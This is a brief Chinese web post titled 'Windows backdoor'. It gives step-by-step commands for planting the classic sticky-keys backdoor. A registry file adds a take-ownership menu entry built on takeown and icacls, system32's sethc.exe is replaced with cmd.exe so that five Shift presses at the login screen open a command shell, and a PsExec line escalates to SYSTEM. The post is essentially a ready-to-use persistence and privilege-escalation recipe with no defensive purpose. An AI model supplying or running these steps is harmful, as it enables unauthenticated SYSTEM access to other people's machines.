windows后门

  • 时间:
  • 来源:互联网
  • 文章标签:

1、打开记事本,输入下列文本:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]

@="获取权限"

"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\*\shell\runas\command]

@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]

@="获取权限"

"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\Directory\shell\runas\command]

@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

2、然后保存为导入.reg文件;

3、然后双击导入.reg;

获取system32文件夹权限后

cmd输入copy cmd.exe sethc.exe即可通过5次shift进入cmd


提权system姿势:

PsExec -s -i explorer.exe

本文链接http://www.taodudu.cc/news/show-647824.html